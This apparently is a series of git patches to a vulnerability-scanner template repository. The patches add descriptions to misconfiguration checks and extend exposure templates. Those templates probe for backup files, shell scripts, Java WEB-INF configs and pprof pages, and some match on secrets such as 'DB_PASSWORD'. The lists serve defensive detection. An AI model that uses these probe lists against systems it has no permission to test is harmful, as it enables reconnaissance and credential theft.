diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 0d8fbb0de8..5754f40cf5 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Ray Dashboard Exposure author: DhiyaneshDk severity: critical + description: Ray Dashboard is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/request-baskets-exposure.yaml b/http/misconfiguration/request-baskets-exposure.yaml index 995cfe7e86..611f4604f7 100644 --- a/http/misconfiguration/request-baskets-exposure.yaml +++ b/http/misconfiguration/request-baskets-exposure.yaml @@ -4,6 +4,7 @@ info: name: Request Baskets - Exposure author: DhiyaneshDk severity: low + description: Request Baskets is exposed. reference: - https://notes.sjtu.edu.cn/s/MUUhEymt7# - https://github.com/entr0pie/CVE-2023-27163 diff --git a/http/misconfiguration/sap/sap-directory-listing.yaml b/http/misconfiguration/sap/sap-directory-listing.yaml index f38e76cdfb..d036e68ed3 100644 --- a/http/misconfiguration/sap/sap-directory-listing.yaml +++ b/http/misconfiguration/sap/sap-directory-listing.yaml @@ -4,6 +4,7 @@ info: name: SAP Directory Listing author: dhiyaneshDK severity: medium + description: SAP Directory Listing is enabled. metadata: max-request: 1 tags: sap,listing,misconfig diff --git a/http/misconfiguration/searchreplacedb2-exposure.yaml b/http/misconfiguration/searchreplacedb2-exposure.yaml index 1f5a17d9c5..e7d8009413 100644 --- a/http/misconfiguration/searchreplacedb2-exposure.yaml +++ b/http/misconfiguration/searchreplacedb2-exposure.yaml @@ -4,6 +4,7 @@ info: name: Safe Search Replace Exposure author: kazet severity: high + description: Safe Search Replace is exposed leaking internal info. reference: - https://interconnectit.com/search-and-replace-for-wordpress-databases/ - https://github.com/interconnectit/Search-Replace-DB diff --git a/http/misconfiguration/secnet-info-leak.yaml b/http/misconfiguration/secnet-info-leak.yaml index 3eaf004a51..9c61762d8a 100644 --- a/http/misconfiguration/secnet-info-leak.yaml +++ b/http/misconfiguration/secnet-info-leak.yaml @@ -4,6 +4,7 @@ info: name: Secnet Intelligent Routing System actpt_5g.data - Information Leak author: DhiyaneshDk severity: high + description: Secnet Intelligent Routing System is exposed. reference: - https://mp.weixin.qq.com/s/lNlI5ZtUJG50ipS0WfytUw - https://github.com/gobysec/GobyVuls/blob/master/secnet_Intelligent_Router_actpt_5g.data_Infoleakage.md diff --git a/http/misconfiguration/seeyon-unauth.yaml b/http/misconfiguration/seeyon-unauth.yaml index aa44bdd567..36ce58c55e 100644 --- a/http/misconfiguration/seeyon-unauth.yaml +++ b/http/misconfiguration/seeyon-unauth.yaml @@ -1,9 +1,10 @@ id: seeyon-unauth info: - name: Seeyon Unauthoried Access + name: Seeyon Unauthorised Access author: pikpikcu severity: high + description: Seeyon is vulnerable to unauthorised access. reference: - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg - https://github.com/chaitin/xray/blob/f90cf321bc4d294bbf6625a9c4853f3bfdf0a384/pocs/seeyon-oa-cookie-leak.yml diff --git a/http/misconfiguration/server-status-localhost.yaml b/http/misconfiguration/server-status-localhost.yaml index c1052a7c2c..f8b32cc4e0 100644 --- a/http/misconfiguration/server-status-localhost.yaml +++ b/http/misconfiguration/server-status-localhost.yaml @@ -4,6 +4,7 @@ info: name: Server Status Disclosure author: pdteam,geeknik severity: low + description: Server Status is exposed. metadata: max-request: 1 tags: apache,debug,misconfig diff --git a/http/misconfiguration/sitecore-debug-page.yaml b/http/misconfiguration/sitecore-debug-page.yaml index c8b42ace8d..7e2176b2d8 100644 --- a/http/misconfiguration/sitecore-debug-page.yaml +++ b/http/misconfiguration/sitecore-debug-page.yaml @@ -4,6 +4,7 @@ info: name: SiteCore Debug Page author: dhiyaneshDK severity: low + description: SiteCore debug page is exposed. metadata: max-request: 1 shodan-query: http.title:"Welcome to Sitecore" diff --git a/http/misconfiguration/sitecore-lfi.yaml b/http/misconfiguration/sitecore-lfi.yaml index b4f5db6b12..9269c188cf 100644 --- a/http/misconfiguration/sitecore-lfi.yaml +++ b/http/misconfiguration/sitecore-lfi.yaml @@ -4,6 +4,7 @@ info: name: Sitecore 9.3 - Webroot File Read author: DhiyaneshDK severity: high + description: SiteCore 9.3 is vulnerable to LFI. reference: - https://blog.assetnote.io/2023/05/10/sitecore-round-two/ metadata: diff --git a/http/misconfiguration/smarterstats-setup.yaml b/http/misconfiguration/smarterstats-setup.yaml index 8cba0ef0a8..98101090df 100644 --- a/http/misconfiguration/smarterstats-setup.yaml +++ b/http/misconfiguration/smarterstats-setup.yaml @@ -4,6 +4,7 @@ info: name: SmarterStats Setup Exposure author: tess severity: high + description: SmarterStats Setup is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/smokeping-grapher.yaml b/http/misconfiguration/smokeping-grapher.yaml index f708f3d940..025c4ac1e2 100644 --- a/http/misconfiguration/smokeping-grapher.yaml +++ b/http/misconfiguration/smokeping-grapher.yaml @@ -4,6 +4,7 @@ info: name: SmokePing Latency Page for Network Latency Grapher author: DhiyaneshDk severity: low + description: SmokePing Latency Page is exposed. reference: - https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448 metadata: diff --git a/http/misconfiguration/sonarqube-public-projects.yaml b/http/misconfiguration/sonarqube-public-projects.yaml index bb1e7edefc..0cb4865ed1 100644 --- a/http/misconfiguration/sonarqube-public-projects.yaml +++ b/http/misconfiguration/sonarqube-public-projects.yaml @@ -4,6 +4,7 @@ info: name: Sonarqube with public projects author: sickwell severity: low + description: Sonarqube public projects detected. reference: - https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true metadata: diff --git a/http/misconfiguration/springboot/spring-eureka.yaml b/http/misconfiguration/springboot/spring-eureka.yaml index 671c9801f4..8a6be82bda 100644 --- a/http/misconfiguration/springboot/spring-eureka.yaml +++ b/http/misconfiguration/springboot/spring-eureka.yaml @@ -4,6 +4,7 @@ info: name: Spring Eureka Exposure author: tess severity: low + description: Spring Eureka is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/springboot/springboot-conditions.yaml b/http/misconfiguration/springboot/springboot-conditions.yaml index 69a8d8ed35..b50bb25538 100644 --- a/http/misconfiguration/springboot/springboot-conditions.yaml +++ b/http/misconfiguration/springboot/springboot-conditions.yaml @@ -4,6 +4,7 @@ info: name: Detect Springboot Conditions Actuator author: DhiyaneshDK severity: low + description: Springboot Conditions Actuator is exposed. reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: diff --git a/http/misconfiguration/springboot/springboot-features.yaml b/http/misconfiguration/springboot/springboot-features.yaml index 000de318ea..90d1c19842 100644 --- a/http/misconfiguration/springboot/springboot-features.yaml +++ b/http/misconfiguration/springboot/springboot-features.yaml @@ -4,6 +4,7 @@ info: name: Detects Springboot Features Actuator author: DhiyaneshDK severity: low + description: Springboot Features Actuator is exposed. metadata: verified: true max-request: 2 diff --git a/http/misconfiguration/springboot/springboot-jolokia.yaml b/http/misconfiguration/springboot/springboot-jolokia.yaml index f742f2473c..f8a8bf0a4f 100644 --- a/http/misconfiguration/springboot/springboot-jolokia.yaml +++ b/http/misconfiguration/springboot/springboot-jolokia.yaml @@ -4,6 +4,7 @@ info: name: Detects Springboot Jolokia Actuator author: DhiyaneshDK severity: low + description: Springboot Jolokia Actuator is exposed. reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: diff --git a/http/misconfiguration/springboot/springboot-logfile.yaml b/http/misconfiguration/springboot/springboot-logfile.yaml index bc494316c2..4d41f7bfdf 100644 --- a/http/misconfiguration/springboot/springboot-logfile.yaml +++ b/http/misconfiguration/springboot/springboot-logfile.yaml @@ -4,6 +4,7 @@ info: name: Detects Springboot Logfile Actuator author: DhiyaneshDK severity: low + description: Springboot Logfile Actuator is exposed. reference: - https://raw.githubusercontent.com/maurosoria/dirsearch/master/db/dicc.txt metadata: diff --git a/http/misconfiguration/springboot/springboot-loggers.yaml b/http/misconfiguration/springboot/springboot-loggers.yaml index 5d4667403f..1fbb4a7f0d 100644 --- a/http/misconfiguration/springboot/springboot-loggers.yaml +++ b/http/misconfiguration/springboot/springboot-loggers.yaml @@ -4,6 +4,7 @@ info: name: Detect Springboot Loggers author: that_juan_,dwisiswant0,wdahlenb severity: low + description: Springboot Loggers is exposed. metadata: max-request: 2 tags: springboot,exposure,misconfig diff --git a/http/misconfiguration/sql-server-report-viewer.yaml b/http/misconfiguration/sql-server-report-viewer.yaml index 25d0450675..c06d29ca0d 100644 --- a/http/misconfiguration/sql-server-report-viewer.yaml +++ b/http/misconfiguration/sql-server-report-viewer.yaml @@ -4,6 +4,7 @@ info: name: SQL Server ReportViewer - Exposure author: kazet severity: high + description: SQL Server ReportViewer page exposed. reference: - https://learn.microsoft.com/en-us/sql/reporting-services/create-deploy-and-manage-mobile-and-paginated-reports?view=sql-server-ver16 metadata: diff --git a/http/misconfiguration/syncthing-dashboard.yaml b/http/misconfiguration/syncthing-dashboard.yaml index fd26f3db31..b3c92468b9 100644 --- a/http/misconfiguration/syncthing-dashboard.yaml +++ b/http/misconfiguration/syncthing-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Syncthing Dashboard Exposure author: fabaff severity: medium + description: Syncthing Dashboard is exposed. reference: - https://syncthing.net/ metadata: diff --git a/http/misconfiguration/system-properties-exposure.yaml b/http/misconfiguration/system-properties-exposure.yaml index 6161914912..261ce13230 100644 --- a/http/misconfiguration/system-properties-exposure.yaml +++ b/http/misconfiguration/system-properties-exposure.yaml @@ -4,6 +4,7 @@ info: name: System Properties Exposure author: DhiyaneshDk severity: low + description: System Properties is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/tasmota-config-webui.yaml b/http/misconfiguration/tasmota-config-webui.yaml index 195599c5a3..ff2587725d 100644 --- a/http/misconfiguration/tasmota-config-webui.yaml +++ b/http/misconfiguration/tasmota-config-webui.yaml @@ -4,6 +4,7 @@ info: name: Tasmota Configuration Exposure author: ritikchaddha severity: medium + description: Tasmota configuration is exposed. reference: - https://github.com/arendst/Tasmota metadata: diff --git a/http/misconfiguration/thinkphp-errors.yaml b/http/misconfiguration/thinkphp-errors.yaml index fe1eff3613..db826fff65 100644 --- a/http/misconfiguration/thinkphp-errors.yaml +++ b/http/misconfiguration/thinkphp-errors.yaml @@ -4,6 +4,7 @@ info: name: ThinkPHP Errors - Sensitive Information Exposure author: j4vaovo severity: medium + description: ThinkPHP error is leaking sensitive info. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/tomcat-cookie-exposed.yaml b/http/misconfiguration/tomcat-cookie-exposed.yaml index 8b8811fd52..4a1527dc5f 100644 --- a/http/misconfiguration/tomcat-cookie-exposed.yaml +++ b/http/misconfiguration/tomcat-cookie-exposed.yaml @@ -4,6 +4,7 @@ info: name: Tomcat Cookie Exposed author: tess,dk999 severity: low + description: Tomcat Cookie is exposed. reference: - https://medium.com/bugbountywriteup/apache-example-servlet-leads-to-61a2720cac20 metadata: diff --git a/http/misconfiguration/typo3-debug-mode.yaml b/http/misconfiguration/typo3-debug-mode.yaml index 67296a7304..5abdfdb3af 100644 --- a/http/misconfiguration/typo3-debug-mode.yaml +++ b/http/misconfiguration/typo3-debug-mode.yaml @@ -4,6 +4,7 @@ info: name: TYPO3 Debug Mode Enabled author: tess severity: low + description: TYPO3 Debug Mode is enabled. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/unauth-axyom-network-manager.yaml b/http/misconfiguration/unauth-axyom-network-manager.yaml index 3a79faec45..89fe1119e8 100644 --- a/http/misconfiguration/unauth-axyom-network-manager.yaml +++ b/http/misconfiguration/unauth-axyom-network-manager.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Axyom Network Manager author: pussycat0x severity: high + description: Axyom Network Manager exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/unauth-kubecost.yaml b/http/misconfiguration/unauth-kubecost.yaml index c502d4f9d7..c4a77b0e89 100644 --- a/http/misconfiguration/unauth-kubecost.yaml +++ b/http/misconfiguration/unauth-kubecost.yaml @@ -4,6 +4,7 @@ info: name: KubeCost - Unauthenticated Dashboard Exposure author: pussycat0x severity: medium + description: KubeCost Dashboard is exposed to external users. reference: https://www.facebook.com/photo?fbid=470414125129112&set=pcb.470413798462478 metadata: verified: true diff --git a/http/misconfiguration/unauth-ldap-account-manager.yaml b/http/misconfiguration/unauth-ldap-account-manager.yaml index 5857be2eb1..a88a46e0e5 100644 --- a/http/misconfiguration/unauth-ldap-account-manager.yaml +++ b/http/misconfiguration/unauth-ldap-account-manager.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated LDAP Account Manager author: tess severity: medium + description: LDAP Account Manager is exposed to external users. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/unauth-mautic-upgrade.yaml b/http/misconfiguration/unauth-mautic-upgrade.yaml index cce1517fdf..956d362e5b 100644 --- a/http/misconfiguration/unauth-mautic-upgrade.yaml +++ b/http/misconfiguration/unauth-mautic-upgrade.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Mautic Upgrade.php Exposure author: huowuzhao severity: high + description: Upgrade.php page in Mautic is exposed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/unauth-mercurial.yaml b/http/misconfiguration/unauth-mercurial.yaml index 6cbc11edc7..095f9c33fa 100644 --- a/http/misconfiguration/unauth-mercurial.yaml +++ b/http/misconfiguration/unauth-mercurial.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Mercurial Detect author: pussycat0x severity: high + description: Mercurial repositories index is disclosed. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/unauth-opache-control-panel.yaml b/http/misconfiguration/unauth-opache-control-panel.yaml index e8e2076b61..7087c69dd6 100644 --- a/http/misconfiguration/unauth-opache-control-panel.yaml +++ b/http/misconfiguration/unauth-opache-control-panel.yaml @@ -4,6 +4,7 @@ info: name: Opache control Panel - Unauthenticated Access author: pussycat0x severity: medium + description: Opache control Panel is exposed. metadata: verified: true max-request: 2 diff --git a/http/misconfiguration/unauth-zwave-mqtt.yaml b/http/misconfiguration/unauth-zwave-mqtt.yaml index bc3f3ecf0e..0fb9734c9c 100644 --- a/http/misconfiguration/unauth-zwave-mqtt.yaml +++ b/http/misconfiguration/unauth-zwave-mqtt.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated ZWave To MQTT Console author: geeknik severity: low + description: ZWave To MQTT Console is exposed. reference: - https://github.com/OpenZWave/Zwave2Mqtt metadata: diff --git a/http/misconfiguration/unauthenticated-lansweeper.yaml b/http/misconfiguration/unauthenticated-lansweeper.yaml index c170f865e7..2763d31f91 100644 --- a/http/misconfiguration/unauthenticated-lansweeper.yaml +++ b/http/misconfiguration/unauthenticated-lansweeper.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Lansweeper Instance author: divya_mudgal severity: high + description: Lansweeper Instance is exposed. metadata: max-request: 1 tags: lansweeper,unauth,misconfig diff --git a/http/misconfiguration/unauthenticated-netdata.yaml b/http/misconfiguration/unauthenticated-netdata.yaml index 124b15aaad..9d50716049 100644 --- a/http/misconfiguration/unauthenticated-netdata.yaml +++ b/http/misconfiguration/unauthenticated-netdata.yaml @@ -4,6 +4,7 @@ info: name: Unauthenticated Netdata author: dhiyaneshDk severity: medium + description: Netdata is exposed. reference: - https://github.com/netdata/netdata metadata: diff --git a/http/misconfiguration/unauthenticated-nginx-dashboard.yaml b/http/misconfiguration/unauthenticated-nginx-dashboard.yaml index 38163d8248..62f016581e 100644 --- a/http/misconfiguration/unauthenticated-nginx-dashboard.yaml +++ b/http/misconfiguration/unauthenticated-nginx-dashboard.yaml @@ -4,6 +4,7 @@ info: name: Nginx Dashboard author: BibekSapkota (sar00n) severity: low + description: Nginx Dashboard is exposed. reference: - https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-nginx-dashboard/ metadata: diff --git a/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml b/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml index 40d26ed618..3238f4966c 100644 --- a/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml +++ b/http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml @@ -4,6 +4,7 @@ info: name: Puppet Node Manager - Unauthorized Access author: pussycat0x severity: medium + description: Pupper Node Manager is exposed to external users. metadata: max-request: 1 fofa-query: 'app="puppet-Node-Manager"' diff --git a/http/misconfiguration/untangle-admin-setup.yaml b/http/misconfiguration/untangle-admin-setup.yaml index d5bc3bf07f..188fe18901 100644 --- a/http/misconfiguration/untangle-admin-setup.yaml +++ b/http/misconfiguration/untangle-admin-setup.yaml @@ -4,6 +4,7 @@ info: name: Untangle Exposed Admin Signup author: ritikchaddha severity: medium + description: Untangle Exposed Admin Signup is exposed publicly. metadata: verified: true max-request: 1 diff --git a/http/misconfiguration/v2x-control.yaml b/http/misconfiguration/v2x-control.yaml index ba37e7b8bb..bfa7984cfe 100644 --- a/http/misconfiguration/v2x-control.yaml +++ b/http/misconfiguration/v2x-control.yaml @@ -4,6 +4,7 @@ info: name: V2X Control - Dashboard Exposure author: DhiyaneshDk severity: low + description: V2X Control Dashboard is exposed. reference: - https://www.facebook.com/photo/?fbid=606940284809828&set=a.467014098802448 metadata: diff --git a/http/misconfiguration/vernemq-status-page.yaml b/http/misconfiguration/vernemq-status-page.yaml index b9a327e9d8..e1de27b690 100644 --- a/http/misconfiguration/vernemq-status-page.yaml +++ b/http/misconfiguration/vernemq-status-page.yaml @@ -4,6 +4,7 @@ info: name: VerneMQ Status Page author: geeknik severity: low + description: VerneMQ Status Page is exposed. reference: - https://github.com/vernemq/vernemq metadata: diff --git a/http/misconfiguration/viewpoint-system-status.yaml b/http/misconfiguration/viewpoint-system-status.yaml index 96d6ae5dbb..e110f01ad1 100644 --- a/http/misconfiguration/viewpoint-system-status.yaml +++ b/http/misconfiguration/viewpoint-system-status.yaml @@ -4,6 +4,7 @@ info: name: ViewPoint System Status author: dhiyaneshDK severity: low + description: ViewPoint System status page is exposed. metadata: max-request: 1 shodan-query: http.title:"ViewPoint System Status" diff --git a/http/misconfiguration/woodwing-git.yaml b/http/misconfiguration/woodwing-git.yaml index 4f701c1528..d43a0471dd 100644 --- a/http/misconfiguration/woodwing-git.yaml +++ b/http/misconfiguration/woodwing-git.yaml @@ -4,6 +4,7 @@ info: name: Woodwing Studio Server - Git Config author: pdteam severity: medium + description: Woodwing Studio Server .git/config file exposed. reference: - https://twitter.com/ynsmroztas/status/1680961398011047936 metadata: diff --git a/http/misconfiguration/woodwing-phpinfo.yaml b/http/misconfiguration/woodwing-phpinfo.yaml index 2cc72aa7a2..bef513c695 100644 --- a/http/misconfiguration/woodwing-phpinfo.yaml +++ b/http/misconfiguration/woodwing-phpinfo.yaml @@ -4,6 +4,7 @@ info: name: Woodwing Studio Server - Phpinfo Config author: pdteam severity: medium + description: Phpinfo Config file exposed in Woodwing Studio Server. reference: - https://twitter.com/ynsmroztas/status/1680961398011047936 metadata: diff --git a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml index 9054bc09c7..00074b51d5 100644 --- a/http/misconfiguration/zhiyuan-oa-unauthorized.yaml +++ b/http/misconfiguration/zhiyuan-oa-unauthorized.yaml @@ -4,6 +4,7 @@ info: name: Zhiyuan Oa Unauthorized author: pikpikcu severity: low + description: Zhiyuan Oa is exposed. reference: - https://buaq.net/go-53721.html metadata: From 7260daecbef0ba8e2b6851511bef968f8988a5bb Mon Sep 17 00:00:00 2001 From: Vikas Gupta <vikasgupta@BizOpss-MacBook-Air-3.local> Date: Wed, 3 Jan 2024 11:41:40 +0530 Subject: [PATCH 013/285] Fixed Lint --- http/misconfiguration/aws/aws-object-listing.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/aws/aws-object-listing.yaml b/http/misconfiguration/aws/aws-object-listing.yaml index 5a225b77bd..5b32a45a9c 100644 --- a/http/misconfiguration/aws/aws-object-listing.yaml +++ b/http/misconfiguration/aws/aws-object-listing.yaml @@ -4,7 +4,7 @@ info: name: AWS bucket with Object listing author: pdteam severity: low - description: Object listing is enabled in AWS bucket. + description: Object listing is enabled in AWS bucket. reference: - https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 metadata: From 3a92dc6667e78fc97643b1e0eb70bf2c35aafdd2 Mon Sep 17 00:00:00 2001 From: boyhack <34109680@qq.com> Date: Thu, 4 Jan 2024 14:42:10 +0800 Subject: [PATCH 014/285] add some filename for zip-backup --- http/exposures/backups/zip-backup-files.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index ae605013fc..8f2139dfe3 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -46,6 +46,20 @@ http: - "old" - "Release" - "inetpub" + - "temp" + - "package" + - "tmp" + - "db" + - "data" + - "database" + - "ftp" + - "output" + - "admin" + - "upload" + - "src" + - "conf/conf" + - "old" + EXT: - "tar" - "7z" From bf40861f6f114940fc9d9f3a3d8934f1357876f2 Mon Sep 17 00:00:00 2001 From: boyhack <34109680@qq.com> Date: Thu, 4 Jan 2024 15:04:14 +0800 Subject: [PATCH 015/285] add pprof debug --- http/exposures/logs/go-pprof-debug.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/exposures/logs/go-pprof-debug.yaml diff --git a/http/exposures/logs/go-pprof-debug.yaml b/http/exposures/logs/go-pprof-debug.yaml new file mode 100644 index 0000000000..3aae1c0e3a --- /dev/null +++ b/http/exposures/logs/go-pprof-debug.yaml @@ -0,0 +1,29 @@ +id: go-pprof-debug + +info: + name: go pprof debug page + author: w8ay + severity: low + description: go pprof debug page was exposed. + tags: logs,exposure,go,pprof + +http: + - method: GET + path: + - "{{BaseURL}}/debug/pprof/heap?debug=1" + - "{{BaseURL}}/pprof/heap?debug=1" + + matchers-condition: and + matchers: + - type: word + words: + - 'heap profile' + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 \ No newline at end of file From 05e13eeba4f6412dad59dd86a14feeb88149fa3f Mon Sep 17 00:00:00 2001 From: boyhack <34109680@qq.com> Date: Thu, 4 Jan 2024 15:04:42 +0800 Subject: [PATCH 016/285] Adding payload --- http/exposures/backups/php-backup-files.yaml | 1 + http/exposures/configs/dockerfile-hidden-disclosure.yaml | 1 + http/exposures/files/shellscripts.yaml | 4 ++++ 3 files changed, 6 insertions(+) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 9d285095bb..68e0f114f5 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -63,6 +63,7 @@ http: - /config.php - /config - /const.DB.php.bak + - /index.php bakext: - ".~" - ".bk" diff --git a/http/exposures/configs/dockerfile-hidden-disclosure.yaml b/http/exposures/configs/dockerfile-hidden-disclosure.yaml index a787930d09..fbd62acf4a 100644 --- a/http/exposures/configs/dockerfile-hidden-disclosure.yaml +++ b/http/exposures/configs/dockerfile-hidden-disclosure.yaml @@ -20,6 +20,7 @@ http: path: - "{{BaseURL}}/.dockerfile" - "{{BaseURL}}/.Dockerfile" + - "{{BaseURL}}/Dockerfile" matchers-condition: and matchers: diff --git a/http/exposures/files/shellscripts.yaml b/http/exposures/files/shellscripts.yaml index 7d50fd4040..692886cd38 100644 --- a/http/exposures/files/shellscripts.yaml +++ b/http/exposures/files/shellscripts.yaml @@ -16,6 +16,7 @@ http: - "{{BaseURL}}/.travis.sh" - "{{BaseURL}}/install.sh" - "{{BaseURL}}/update.sh" + - "{{BaseURL}}/upload.sh" - "{{BaseURL}}/config.sh" - "{{BaseURL}}/build.sh" - "{{BaseURL}}/setup.sh" @@ -34,6 +35,9 @@ http: - "{{BaseURL}}/local2dev.sh" - "{{BaseURL}}/local2prod.sh" - "{{BaseURL}}/prod2local.sh" + - "{{BaseURL}}/rsync.sh" + - "{{BaseURL}}/sync.sh" + - "{{BaseURL}}/test.sh" matchers-condition: and matchers: From 1fbdbae033425020e0b717a76992d77b4cf220c7 Mon Sep 17 00:00:00 2001 From: boyhack <34109680@qq.com> Date: Thu, 4 Jan 2024 15:12:53 +0800 Subject: [PATCH 017/285] add java web config files --- .../configs/java-web-config-files.yaml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/exposures/configs/java-web-config-files.yaml diff --git a/http/exposures/configs/java-web-config-files.yaml b/http/exposures/configs/java-web-config-files.yaml new file mode 100644 index 0000000000..10b7048f2e --- /dev/null +++ b/http/exposures/configs/java-web-config-files.yaml @@ -0,0 +1,54 @@ +id: java web config files + +info: + name: java web config files + author: w8ay + severity: low + description: java web config files was exposed. + tags: exposure,java,config + +http: + - method: GET + path: + - "{{BaseURL}}/WEB-INF/web.xml" + - "{{BaseURL}}/WEB-INF/applicationContext.xml" + - "{{BaseURL}}/WEB-INF/applicationContext-slave.xml" + - "{{BaseURL}}/WEB-INF/config.xml" + - "{{BaseURL}}/WEB-INF/spring.xml" + - "{{BaseURL}}/WEB-INF/struts-config.xml" + - "{{BaseURL}}/WEB-INF/struts-front-config.xml" + - "{{BaseURL}}/WEB-INF/struts/struts-config.xml" + - "{{BaseURL}}/WEB-INF/classes/spring.xml" + - "{{BaseURL}}/WEB-INF/classes/struts.xml" + - "{{BaseURL}}/WEB-INF/classes/struts_manager.xml" + - "{{BaseURL}}/WEB-INF/classes/conf/datasource.xml" + - "{{BaseURL}}/WEB-INF/classes/data.xml" + - "{{BaseURL}}/WEB-INF/classes/config/applicationContext.xml" + - "{{BaseURL}}/WEB-INF/classes/applicationContext.xml" + - "{{BaseURL}}/WEB-INF/classes/conf/spring/applicationContext-datasource.xml" + - "{{BaseURL}}/WEB-INF/config/db/dataSource.xml" + - "{{BaseURL}}/WEB-INF/spring-cfg/applicationContext.xml" + - "{{BaseURL}}/WEB-INF/dwr.xml" + - "{{BaseURL}}/WEB-INF/classes/hibernate.cfg.xml" + - "{{BaseURL}}/WEB-INF/classes/rabbitmq.xml" + - "{{BaseURL}}/WEB-INF/conf/activemq.xml" + - "{{BaseURL}}/server.xml" + - "{{BaseURL}}/conf/web.xml" + - "{{BaseURL}}/conf/server.xml" + + matchers-condition: and + matchers: + - type: word + words: + - '<?xml' + + - type: word + part: header + words: + - "application/xml" + - "text/xml" + condition: or + + - type: status + status: + - 200 \ No newline at end of file From 23c34a9c1bf1f7aaf18057adccc89031cab29de5 Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Sun, 7 Jan 2024 05:09:02 +0200 Subject: [PATCH 018/285] added more config of presta --- http/exposures/backups/php-backup-files.yaml | 8 +++++--- http/exposures/backups/settings-php-files.yaml | 2 +- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index d7d6b72ad5..89b542f535 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -44,8 +44,10 @@ http: - /e/config/config.php # empirecms - /data/sql_config.php # phpwind - /data/bbscache/config.php # phpwind - - /app/config/parameters.yml # prestashop - - /app/config/parameters.php # prestashop + - /app/config/parameters.yml # prestashop 1.7 + - /app/config/parameters.php # prestashop 1.7 + - /config/settings.inc.php # prestashop > 1.5,1.6 + - /config/settings.old.php # prestashop > 1.5,1.6 - /db.php - /conn.php - /database.php @@ -64,7 +66,7 @@ http: - /wp-login.php - /config.php - /config - - /const.DB.php.bak + - /const.DB.php bakext: - ".~" - ".bk" diff --git a/http/exposures/backups/settings-php-files.yaml b/http/exposures/backups/settings-php-files.yaml index 7c2d449e38..2624beea96 100644 --- a/http/exposures/backups/settings-php-files.yaml +++ b/http/exposures/backups/settings-php-files.yaml @@ -22,7 +22,7 @@ http: - "{{BaseURL}}/settings.php.save" - "{{BaseURL}}/settings.php.swp" - "{{BaseURL}}/settings.php.txt" - + - "{{BaseURL}}config/settings.old.php" matchers-condition: and matchers: - type: word From e9d51839913b70304ed90ab92d4b18d4d79c387f Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Sun, 7 Jan 2024 06:00:10 +0200 Subject: [PATCH 019/285] added MODX config --- http/exposures/backups/php-backup-files.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 89b542f535..d2ebaee6b2 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -48,6 +48,7 @@ http: - /app/config/parameters.php # prestashop 1.7 - /config/settings.inc.php # prestashop > 1.5,1.6 - /config/settings.old.php # prestashop > 1.5,1.6 + - /manager/includes/config.inc.php # MODX CMS - /db.php - /conn.php - /database.php @@ -73,6 +74,7 @@ http: - ".bak" - ".bkp" - ".BAK" + - ".blank" - ".swp" - ".swo" - ".swn" @@ -119,6 +121,7 @@ http: - "$_SERVER[" - "'DB_PASSWORD'" - "'DBPASS'" + - "database_type" - "define('DB" condition: or From 92b7fa1e747581062e71347a7e8c005584039378 Mon Sep 17 00:00:00 2001 From: mastercho <souljanboy@gmail.com> Date: Sun, 7 Jan 2024 07:15:37 +0200 Subject: [PATCH 020/285] added more config --- http/exposures/backups/php-backup-files.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index d2ebaee6b2..55d6130d21 100644 --- 